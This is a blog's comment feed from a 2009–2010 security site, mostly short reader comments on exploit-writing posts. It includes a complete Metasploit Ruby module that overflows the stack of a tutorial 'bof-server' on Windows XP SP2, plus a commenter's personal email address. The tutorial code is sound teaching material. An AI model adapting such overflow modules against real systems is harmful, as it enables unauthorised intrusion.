Comments for redstack http://redstack.net/blog Pirates are way cooler than Ninjas, but not as much as Samuraïs Sun, 10 Jan 2010 17:13:30 +0100 http://wordpress.org/?v=2.8.5 hourly 1 Comment on Writing exploits for Metasploit 3.0 by matad0r http://redstack.net/blog/2008/01/24/writing-exploits-for-metasploit-30/comment-page-1/#comment-9595 matad0r Sun, 10 Jan 2010 17:13:30 +0000 http://redstack.net/blog/index.php/2008/01/24/writing-exploits-for-metasploit-30.html#comment-9595 Hi ! Very very helpful tutorial ! Thanks ! Hi !
Very very helpful tutorial !
Thanks !

]]> Comment on Intel(r) switches backdoor by lampson http://redstack.net/blog/2008/05/19/intelr-switches-backdoor/comment-page-1/#comment-9241 lampson Mon, 21 Dec 2009 04:36:34 +0000 http://redstack.net/blog/index.php/2008/05/19/intelr-switches-backdoor.html#comment-9241 Hi, can anybody send me a last firmware for intel express 460t, Thanks. lampsonlam@hotmail.com Hi, can anybody send me a last firmware for intel express 460t, Thanks.

lampsonlam@hotmail.com

]]> Comment on Linux kernel 2.6.31 perf_counter_open exploit by ties http://redstack.net/blog/2009/09/24/linux-kernel-2631-perf_counter_open-exploit/comment-page-1/#comment-8186 ties Sat, 31 Oct 2009 00:18:46 +0000 http://redstack.net/blog/?p=70#comment-8186 Write more ! :( Write more ! :(

]]> Comment on Linux kernel 2.6.31 perf_counter_open exploit by argp http://redstack.net/blog/2009/09/24/linux-kernel-2631-perf_counter_open-exploit/comment-page-1/#comment-7846 argp Sun, 18 Oct 2009 14:04:47 +0000 http://redstack.net/blog/?p=70#comment-7846 Nice post. Nice post.

]]> Comment on Linux kernel 2.6.31 perf_counter_open exploit by core http://redstack.net/blog/2009/09/24/linux-kernel-2631-perf_counter_open-exploit/comment-page-1/#comment-7747 core Tue, 13 Oct 2009 21:41:32 +0000 http://redstack.net/blog/?p=70#comment-7747 excellent writeup! excellent writeup!

]]> Comment on Linux kernel 2.6.31 perf_counter_open exploit by xipe http://redstack.net/blog/2009/09/24/linux-kernel-2631-perf_counter_open-exploit/comment-page-1/#comment-7708 xipe Sat, 10 Oct 2009 15:16:09 +0000 http://redstack.net/blog/?p=70#comment-7708 Thank you Keen :) - Xipe Thank you Keen :)
- Xipe

]]> Comment on Linux kernel 2.6.31 perf_counter_open exploit by Keen Observer http://redstack.net/blog/2009/09/24/linux-kernel-2631-perf_counter_open-exploit/comment-page-1/#comment-7707 Keen Observer Sat, 10 Oct 2009 06:16:50 +0000 http://redstack.net/blog/?p=70#comment-7707 Also, credits should go to Silvio Cesare for being the first to use iret in 03, so there! Also, credits should go to Silvio Cesare for being the first to use iret in 03, so there!

]]> Comment on Linux kernel 2.6.31 perf_counter_open exploit by Keen Observer http://redstack.net/blog/2009/09/24/linux-kernel-2631-perf_counter_open-exploit/comment-page-1/#comment-7705 Keen Observer Sat, 10 Oct 2009 06:06:33 +0000 http://redstack.net/blog/?p=70#comment-7705 Spender has always been out for glory, it's common news that he stole the whole grsecurity ideology, I mean -- a bug was discovered, and exploited over a week ago, and he scouts the internet for blogs that talk about it without giving credit to him and qaaz, funny how it's not qaaz that complains ;) -- Good work xipe, continue posting more, I'm sure a lot of people congratulate your efforts. Spender has always been out for glory, it’s common news that he stole the whole grsecurity ideology, I mean — a bug was discovered, and exploited over a week ago, and he scouts the internet for blogs that talk about it without giving credit to him and qaaz, funny how it’s not qaaz that complains ;) — Good work xipe, continue posting more, I’m sure a lot of people congratulate your efforts.

]]> Comment on Writing exploits for Metasploit 3.0 by xipe http://redstack.net/blog/2008/01/24/writing-exploits-for-metasploit-30/comment-page-1/#comment-7616 xipe Tue, 29 Sep 2009 17:23:02 +0000 http://redstack.net/blog/index.php/2008/01/24/writing-exploits-for-metasploit-30.html#comment-7616 Hi Elv13, With metasploit 3.2, some things change concerning the class definition. You should replace : <pre lang="ruby"> require 'msf/core' module Msf # class name should reflect directories class Exploits::Windows::Dummy::BofServer < Msf::Exploit::Remote include Exploit::Remote::Tcp </pre> with : <pre lang="ruby"> require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp </pre> So the new file would be: <pre lang="ruby"> require 'msf/core' # class name should reflect directories class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp # exploit relative informations def initialize(info = {}) super(update_info(info, 'Name' => 'bof-server exploit', 'Description' => 'This is an exploit for bof-server v0.01', 'Author' => 'xipe', # You ;) 'Version' => '1.0', 'Payload' => { 'Space' => 500, # Space that payload can use. # We found that we needed 520 bytes to make the # bof-server crash, but we will only use 500, as # the end of this space can be modified by the target # before returning. 'StackAdjustment' => -3500, # Modify stack pointer at shellcode start # so it can use the stack without writing # on itself. 'BadChars' => "\x00\x20\x0D\x0A", # Chars that payloads should not # contains. }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2 English', { 'Platform' =>'win', 'Ret' => 0x22fb65 # Return address. } ], ], 'DefaultTarget' => 0)) end def check # Here we should check if the target is vulnerable # This function should not crash the target connect buf = "version\n" sock.put(buf) res = sock.get disconnect if res =~ /bof-server v0.01/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit # Here we should exploit the target connect buf = payload.encoded # Size of the payload is defined by Payload.Space in exploit infos. buf << make_nops(20) # Some more bytes, as we defined the payload to be 500 bytes long buf << [target.ret].pack('V') # Return address sock.put(buf) # send data sock.get handler # pass the connection to the payload handler disconnect end end </pre> Best regards, - Xipe Hi Elv13,

With metasploit 3.2, some things change concerning the class definition.
You should replace :

require 'msf/core'
module Msf
  # class name should reflect directories
  class Exploits::Windows::Dummy::BofServer < Msf::Exploit::Remote
    include Exploit::Remote::Tcp

with :

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::Remote::Tcp

So the new file would be:

require 'msf/core'
  # class name should reflect directories                                                                                                                                                                                                                                              
  class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::Remote::Tcp
 
    # exploit relative informations
    def initialize(info = {})
      super(update_info(info,
                        'Name'           => 'bof-server exploit',
                        'Description'    => 'This is an exploit for bof-server v0.01',
                        'Author'         => 'xipe', # You ;)
                        'Version'        => '1.0',
                        'Payload'        =>
                        {
                          'Space'    => 500, # Space that payload can use.
                                             # We found that we needed 520 bytes to make the
                                             # bof-server crash, but we will only use 500, as
                                             # the end of this space can be modified by the target
                                             # before returning.
                          'StackAdjustment' => -3500, # Modify stack pointer at shellcode start
                                                      # so it can use the stack without writing
                                                      # on itself.
                          'BadChars' => "\x00\x20\x0D\x0A", # Chars that payloads should not
                                                            # contains.
                        },
                        'Platform'   => 'win',
                        'Targets'    =>
                        [
                         [ 'Windows XP SP2 English',
                             {
                               'Platform' =>'win',
                               'Ret' => 0x22fb65 # Return address.                                                                                                                                                                                                                     
                             }
                          ],
                        ],
                        'DefaultTarget' => 0))
    end
 
    def check
      # Here we should check if the target is vulnerable                                                                                                                                                                                                                               
      # This function should not crash the target                                                                                                                                                                                                                                      
      connect
      buf = "version\n"
      sock.put(buf)
      res = sock.get
      disconnect
      if res =~ /bof-server v0.01/
        return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Safe
    end
 
    def exploit
      # Here we should exploit the target 
      connect
      buf = payload.encoded # Size of the payload is defined by Payload.Space in exploit infos.
      buf << make_nops(20) # Some more bytes, as we defined the payload to be 500 bytes long
      buf << [target.ret].pack('V') # Return address
      sock.put(buf) # send data
      sock.get
      handler # pass the connection to the payload handler
      disconnect
    end
end

Best regards,
- Xipe

]]> Comment on Writing exploits for Metasploit 3.0 by Elv13 http://redstack.net/blog/2008/01/24/writing-exploits-for-metasploit-30/comment-page-1/#comment-7614 Elv13 Tue, 29 Sep 2009 15:48:12 +0000 http://redstack.net/blog/index.php/2008/01/24/writing-exploits-for-metasploit-30.html#comment-7614 Hi, I try to use this exploit, but always fail with this error: /opt/metasploit/framework-3.2/modules/exploits/linux/dummy/bof-server.rb: NameError /opt/metasploit/framework-3.2/data/msfweb/vendor/rails/activerecord/lib/../../activesupport/lib/active_support/dependencies.rb:116:in `qualified_const_defined?': "#::Msf" is not a valid constant name! I use metasploit from Linux and ported your C code to Linux without much trouble. It seem to work (server crash normally), but I am not able to launch the exploit. I also installed bufserver on windows and try to hack it from Linux, but I fail too. Whats wrong? Hi, I try to use this exploit, but always fail with this error:
/opt/metasploit/framework-3.2/modules/exploits/linux/dummy/bof-server.rb: NameError /opt/metasploit/framework-3.2/data/msfweb/vendor/rails/activerecord/lib/../../activesupport/lib/active_support/dependencies.rb:116:in `qualified_const_defined?’: “#::Msf” is not a valid constant name!

I use metasploit from Linux and ported your C code to Linux without much trouble. It seem to work (server crash normally), but I am not able to launch the exploit. I also installed bufserver on windows and try to hack it from Linux, but I fail too. Whats wrong?

]]>